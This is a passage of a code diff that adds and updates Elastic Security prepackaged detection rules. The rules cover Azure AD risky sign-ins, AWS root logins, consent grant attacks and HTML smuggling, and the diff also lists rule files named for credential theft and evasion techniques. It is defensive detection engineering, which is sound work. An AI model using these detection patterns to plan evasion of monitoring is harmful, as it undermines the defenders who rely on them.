'./privilege_escalation_azure_kubernetes_rolebinding_created.json'; +import rule608 from './collection_posh_audio_capture.json'; +import rule609 from './collection_posh_screen_grabber.json'; +import rule610 from './defense_evasion_posh_compressed.json'; +import rule611 from './defense_evasion_suspicious_process_creation_calltrace.json'; +import rule612 from './privilege_escalation_group_policy_iniscript.json'; +import rule613 from './privilege_escalation_group_policy_privileged_groups.json'; +import rule614 from './privilege_escalation_group_policy_scheduled_task.json'; +import rule615 from './defense_evasion_clearing_windows_console_history.json'; +import rule616 from './threat_intel_filebeat8x.json'; +import rule617 from './privilege_escalation_installertakeover.json'; +import rule618 from './credential_access_via_snapshot_lsass_clone_creation.json'; +import rule619 from './persistence_via_bits_job_notify_command.json'; +import rule620 from './execution_suspicious_java_netcon_childproc.json'; +import rule621 from './privilege_escalation_samaccountname_spoofing_attack.json'; +import rule622 from './credential_access_symbolic_link_to_shadow_copy_created.json'; +import rule623 from './credential_access_mfa_push_brute_force.json'; +import rule624 from './persistence_azure_global_administrator_role_assigned.json'; +import rule625 from './persistence_microsoft_365_global_administrator_role_assign.json'; +import rule626 from './lateral_movement_malware_uploaded_onedrive.json'; +import rule627 from './lateral_movement_malware_uploaded_sharepoint.json'; +import rule628 from './defense_evasion_ms_office_suspicious_regmod.json'; +import rule629 from './initial_access_o365_user_reported_phish_malware.json'; +import rule630 from './defense_evasion_microsoft_365_mailboxauditbypassassociation.json'; +import rule631 from './credential_access_disable_kerberos_preauth.json'; +import rule632 from './credential_access_posh_request_ticket.json'; +import rule633 from './credential_access_shadow_credentials.json'; +import rule634 from './privilege_escalation_pkexec_envar_hijack.json'; +import rule635 from './credential_access_seenabledelegationprivilege_assigned_to_user.json'; +import rule636 from './persistence_msds_alloweddelegateto_krbtgt.json'; +import rule637 from './defense_evasion_disable_posh_scriptblocklogging.json'; +import rule638 from './persistence_ad_adminsdholder.json'; +import rule639 from './privilege_escalation_windows_service_via_unusual_client.json'; +import rule640 from './credential_access_dcsync_replication_rights.json'; +import rule641 from './credential_access_lsass_memdump_handle_access.json'; +import rule642 from './credential_access_moving_registry_hive_via_smb.json'; +import rule643 from './credential_access_suspicious_winreg_access_via_sebackup_priv.json'; +import rule644 from './credential_access_spn_attribute_modified.json'; +import rule645 from './persistence_dontexpirepasswd_account.json'; +import rule646 from './persistence_sdprop_exclusion_dsheuristics.json'; +import rule647 from './credential_access_remote_sam_secretsdump.json'; +import rule648 from './defense_evasion_workfolders_control_execution.json'; +import rule649 from './credential_access_user_impersonation_access.json'; +import rule650 from './persistence_redshift_instance_creation.json'; +import rule651 from './persistence_crontab_creation.json'; +import rule652 from './privilege_escalation_krbrelayup_service_creation.json'; +import rule653 from './credential_access_relay_ntlm_auth_via_http_spoolss.json'; +import rule654 from './execution_shell_evasion_linux_binary.json'; +import rule655 from './execution_process_started_in_shared_memory_directory.json'; +import rule656 from './execution_abnormal_process_id_file_created.json'; +import rule657 from './execution_process_started_from_process_id_file.json'; +import rule658 from './privilege_escalation_suspicious_dnshostname_update.json'; +import rule659 from './command_and_control_connection_attempt_by_non_ssh_root_session.json'; +import rule660 from './execution_user_exec_to_pod.json'; +import rule661 from './defense_evasion_elastic_agent_service_terminated.json'; +import rule662 from './defense_evasion_proxy_execution_via_msdt.json'; +import rule663 from './discovery_enumerating_domain_trusts_via_nltest.json'; +import rule664 from './credential_access_lsass_handle_via_malseclogon.json'; +import rule665 from './discovery_suspicious_self_subject_review.json'; +import rule666 from './initial_access_evasion_suspicious_htm_file_creation.json'; +import rule667 from './persistence_exposed_service_created_with_type_nodeport.json'; +import rule668 from './privilege_escalation_pod_created_with_hostipc.json'; +import rule669 from './privilege_escalation_pod_created_with_hostnetwork.json'; +import rule670 from './privilege_escalation_pod_created_with_hostpid.json'; +import rule671 from './privilege_escalation_privileged_pod_created.json'; +import rule672 from './execution_tc_bpf_filter.json'; +import rule673 from './persistence_insmod_kernel_module_load.json'; +import rule674 from './privilege_escalation_pod_created_with_sensitive_hospath_volume.json'; +import rule675 from './persistence_dynamic_linker_backup.json'; +import rule676 from './defense_evasion_hidden_shared_object.json'; +import rule677 from './defense_evasion_chattr_immutable_file.json'; +import rule678 from './persistence_chkconfig_service_add.json'; +import rule679 from './persistence_etc_file_creation.json'; +import rule680 from './impact_process_kill_threshold.json'; export const rawRules = [ rule1, @@ -1358,4 +1365,11 @@ export const rawRules = [ rule671, rule672, rule673, + rule674, + rule675, + rule676, + rule677, + rule678, + rule679, + rule680, ]; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json index 5abbbb1b1c6ed..fe32a291138b4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json @@ -12,15 +12,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Active Directory High Risk Sign-in", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk Sign-in\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by Microsoft Identity Protection with high risk levels or high aggregated risk level.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user. \n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.signinlogs and\n (azure.signinlogs.properties.risk_level_during_signin:high or azure.signinlogs.properties.risk_level_aggregated:high) and\n event.outcome:(success or Success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/howto-conditional-access-policy-risk", "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection", "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.signinlogs.properties.risk_level_aggregated", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.risk_level_during_signin", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "37994bca-0611-4500-ab67-5588afe73b77", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nNote that details for `azure.signinlogs.properties.risk_level_during_signin` and `azure.signinlogs.properties.risk_level_aggregated`\nare only available for Azure AD Premium P2 customers. All other customers will be returned `hidden`.", "severity": "high", "tags": [ "Elastic", @@ -49,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json index 9a588422fcf35..3b81be30bff10 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json @@ -11,15 +11,40 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Active Directory High Risk User Sign-in Heuristic", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk User Sign-in Heuristic\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by the Microsoft Identity Protection with a risk state equal to `confirmedCompromised`\nor `atRisk`.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user. \n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.risk_state:(\"confirmedCompromised\" or \"atRisk\") and event.outcome:(success or Success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk" + "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk", + "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework" + ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.signinlogs.properties.risk_state", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } ], "risk_score": 47, "rule_id": "26edba02-6979-4bce-920a-70b080a7be81", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json index 207d5534efd79..bb8061aa542e1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json @@ -14,14 +14,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Active Directory PowerShell Sign-in", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Azure Active Directory PowerShell Sign-in\n\nAzure Active Directory PowerShell for Graph (Azure AD PowerShell) is a module IT professionals commonly use to manage\ntheir Azure Active Directory. The cmdlets in the Azure AD PowerShell module enable you to retrieve data from the\ndirectory, create new objects in the directory, update existing objects, remove objects, as well as configure the\ndirectory and its features.\n\nThis rule identifies sign-ins that use the Azure Active Directory PowerShell module, which can indicate unauthorized\naccess if done outside of IT or engineering.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to access Azure AD using PowerShell to complete its tasks.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the involved user account. Do they look normal?\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate suspicious actions taken by the user using the module, for example, modifications in security settings\nthat weakens the security policy, persistence-related tasks, and data access.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding IT, Engineering, and other authorized users\nas exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.app_display_name:\"Azure Active Directory PowerShell\" and\n azure.signinlogs.properties.token_issuer_type:AzureAD and event.outcome:(success or Success)\n", "references": [ "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/", "https://docs.microsoft.com/en-us/microsoft-365/enterprise/connect-to-microsoft-365-powershell?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.signinlogs.properties.app_display_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.token_issuer_type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a605c51a-73ad-406d-bf3a-f24cc41d5c97", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json index 45acc46fcd49d..3718b800156d7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json @@ -11,13 +11,58 @@ "language": "kuery", "license": "Elastic License v2", "name": "Possible Consent Grant Attack via Azure-Registered Application", - "note": "## Triage and analysis\n\n- In a consent grant attack, an attacker tricks an end user into granting a malicious application consent to access their data, usually via a phishing attack. After the malicious application has been granted consent, it has account-level access to data without the need for an organizational account.\n- Normal remediation steps, like resetting passwords for breached accounts or requiring Multi-Factor Authentication (MFA) on accounts, are not effective against this type of attack, since these are third-party applications and are external to the organization.\n- Security analysts should review the list of trusted applications for any suspicious items.\n\n\n## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and \n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", + "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data\nsuch as contact information, email, or documents. The attacker then tricks an end user into granting that application\nconsent to access their data either through a phishing attack, or by injecting illicit code into a trusted website.\nAfter the illicit application has been granted consent, it has account-level access to data without the need for an\norganizational account. Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor\nauthentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications\nand are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Malicious applications abuse the same workflow used by legitimate apps.\nThus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete\nthis task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be\nused to complete this task.\n- Revoke the refresh token for all users assigned to the application. Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. Activate your Data Loss\nincident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature. \n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide" + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + }, + { + "package": "azure", + "version": "0.12.0" + }, + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } ], "risk_score": 47, "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -68,5 +113,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json index 346f679b6c570..5e885b6a69eb7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json @@ -15,14 +15,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Management Console Root Login", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Management Console Root Login\n\nThe AWS root account is the one identity that has complete access to all AWS services and resources in the account,\nwhich is created when the AWS account is created. AWS strongly recommends that you do not use the root user for your\neveryday tasks, even the administrative ones. Instead, adhere to the best practice of using the root user only to create\nyour first IAM user. Then securely lock away the root user credentials and use them to perform only a few account and\nservice management tasks. AWS provides a [list of the tasks that require root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule looks for attempts to log in to the AWS Management Console as the root user.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Examine whether this activity is common in the environment by looking for past occurrences on your logs.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the\n calling user?\n- Examine the commands, API calls, and data management actions performed by the account in the last 24 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking access to servers,\nservices, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- The alert can be dismissed if this operation is done under change management and approved according to the\norganization's policy for performing a task that needs this privilege level.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Identify the services or servers involved criticality.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify if there are any regulatory or legal ramifications related to this activity.\n- Configure multi-factor authentication for the user.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and aws.cloudtrail.user_identity.type:Root and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" ], - "risk_score": 73, + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, "rule_id": "e2a67480-3b79-403d-96e3-fdd2992c50ef", - "severity": "high", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", "tags": [ "Elastic", "Cloud", @@ -65,5 +100,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_evasion_suspicious_htm_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_evasion_suspicious_htm_file_creation.json new file mode 100644 index 0000000000000..0f662ed769deb --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_evasion_suspicious_htm_file_creation.json @@ -0,0 +1,126 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a browser process to open an HTML file with high entropy and size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious HTML File Creation", + "note": "", + "query": "sequence by user.id with maxspan=5m\n [file where event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.entropy", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Windows", + "Threat Detection", + "Initial Access" + ], + "threat": [ + { + 